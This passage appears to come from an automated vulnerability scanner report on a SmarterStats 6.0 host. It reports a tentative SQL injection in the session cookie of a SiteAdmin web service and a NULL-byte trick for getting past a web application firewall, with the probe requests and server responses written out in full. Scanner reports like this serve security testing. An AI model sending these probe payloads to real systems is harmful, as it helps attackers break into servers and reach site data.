               InitAjaxHandlers();
               ShowSection(currentSection, currentSection);
               Initialize();
               DoResize();
               setTimeout(function() { $('#loadingMessage').hide(); }, self.isNavigatingToHash ? 500 : 250);
           });
       </script>

       
       
<div id="ConfirmWindow" class="ConfirmWindow" style="display: none">
   <div id="DivConfirmContent" class="ConfirmContent">
       <div class="ConfirmNote" id="ConfirmText">
           &nbsp;
       </div>
   </div>
   <div id="ctl00_DC1_Button" class="PopupButtons">
       <div class="ButtonBarRight">
           <span id="CancelButtonWrapper">
               <div id="ctl00_DC1_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CancelPopup();; return false;"><span class="BBInner">Cancel</span></a></div>
           </span>
           <div id="ctl00_DC1_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OKPopup();; return false;"><span class="BBInner">OK</span></a></div>
       </div>
   </div>
   <span id="MessageHeaderText" style="display: none">
       Message</span>
   <input style="position: absolute; top: -1000px;" id="DeleteKeyCaptureBox" />

   <script type="text/javascript">
       function GetConfirmTitle() {
           return $('#MessageHeaderText').html();
       }
       function ShowAlert(errorMessage) {
           $('#CancelButtonWrapper').css('display', 'none');
           $('#ConfirmText').html(errorMessage).css('display', '');
       }
       function ShowConfirm(type, size) {
           var displayText = confirmationDialogKeys[type];
           if (displayText == undefined) displayText = type;
           $('#CancelButtonWrapper').css('display', '');
           $('#ConfirmText').html(displayText.replace(/\{0\}/g, size.toString()));
           $('#DeleteConfirmCount').html(size.toString());
       }
       function CancelPopup() {
           parent.ConfirmCallback(false);
           ClosePopup();
       }
       function OKPopup() {
           parent.ConfirmCallback(true);
           ClosePopup();
       }
       $('#DeleteKeyCaptureBox').live('keydown', function(evt) {
           CancelEvent(evt);
           if ($('#ConfirmWindowModal').attr('display') == 'none') return;
           if (evt.keyCode == 13 || evt.which == 13) OKPopup();
           else if (evt.keyCode == 27 || evt.which == 27) CancelPopup();
           return false;
       });
   </script>

</div>

       
   

<script type="text/javascript">
//<![CDATA[
ClearTreeToggle();
SidebarAjaxLoaded();if (self.LeftBarReady) self.LeftBarReady();$(function() { $('#ctl00_Split').hyperSplitter({"IsHorizontal":true,"Panes":[{"Resizable":false,"SplitBar":false,"MinWidth":46,"MaxWidth":46,"Width":46,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SB"},{"Resizable":true,"SplitBar":false,"MinWidth":185,"MaxWidth":300,"Width":250,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":"RootLPSize","_ClientID":"ctl00_Split_LP"},{"Resizable":false,"SplitBar":true,"MinWidth":2,"MaxWidth":2,"Width":2,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SplitBar"},{"Resizable":false,"SplitBar":false,"MinWidth":0,"MaxWidth":0,"Width":0,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_Frame"}]}); });
$(function() { $('#ctl00_Split_LP_ctl01_menuSN').hyperMenu({"ClearFloat":true,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuSN_menuGlobalNew":"return false;"},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_Split_LP_ctl01_treeNav').hyperTreeView({"imagePath":"/App_Themes/Default/Images/16x16/","NoLines":false,"ContextMenuID":null,"FunctionMap":{"ctl00_Split_LP_ctl01_treeNav_htv0_htv0":"UpdateFrame(\u0027\\x2fClient\\x2ffrmUser\\x2easpx\\x3faction\\x3dmysettings\u0027);","ctl00_Split_LP_ctl01_treeNav_htv0_htv1":"UpdateFrame(\u0027\\x2fClient\\x2ffrmFilterSets\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv0":"UpdateFrame(\u0027\\x2fClient\\x2ffrmImportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv1":"UpdateFrame(\u0027\\x2fClient\\x2ffrmUsers\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv2":"UpdateFrame(\u0027\\x2fClient\\x2ffrmEmailReportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv3":"UpdateFrame(\u0027\\x2fClient\\x2ffrmPageAliases\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv4":"UpdateFrame(\u0027\\x2fClient\\x2ffrmSkins\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv5":"UpdateFrame(\u0027\\x2fClient\\x2ffrmSeoSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv6":"UpdateFrame(\u0027\\x2fClient\\x2ffrmLogsImported\\x2easpx\u0027);"},"ClientCallbacks":{"onExpand":"RecordTreeExpanded","onCollapse":"RecordTreeCollapsed"}}); });
//]]>
</script>
</form>
</body>
</html>


2.5. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%00'; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%00''; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28998
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites2</h2>
<p class="intro">Returns all sites listed in the MRS with multiple log locations.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
